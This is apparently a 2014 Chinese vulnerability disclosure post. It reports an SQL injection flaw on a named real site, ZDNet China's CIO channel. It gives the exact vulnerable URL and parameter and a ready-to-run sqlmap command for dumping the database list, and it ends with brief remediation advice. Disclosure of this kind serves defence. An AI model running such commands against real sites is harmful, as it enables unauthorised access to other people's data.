至顶网某分站SQL注入漏洞下载
-
来源:黑吧安全网 浏览:1082次 时间:2014-04-28
至顶网某分站存在SQL注入漏洞,泄漏数据库数据信息等。
再次发现至顶网CIO与应用频道(http://cio.zdnet.com.cn)的另外一SQL注入漏洞,具体的漏洞URL如下:
http://cio.zdnet.com.cn/files/index_more_ajax.php?docid=3012136&num=0&subid=tuijian&type=cio_more
其中参数docid存在问题,SQLmap注入命令如下:
sqlmap.py -u "http://cio.zdnet.com.cn/files/index_more_ajax.php?docid=3012136&num=0&subid=tuijian&type=cio_more" -p "docid" --dbs --thread 10 --time-sec 20
如图所示,可以获取到数据库中的表数据等信息:
表神马的我就不继续了,较浪费时间!大半夜的,休息!
修复方案:
1,对相关参数进行类型判断,过滤等;
2,检查SQL语句,禁止使用拼接语句;
上一篇: 天津联通网站存在SQL注入漏洞下载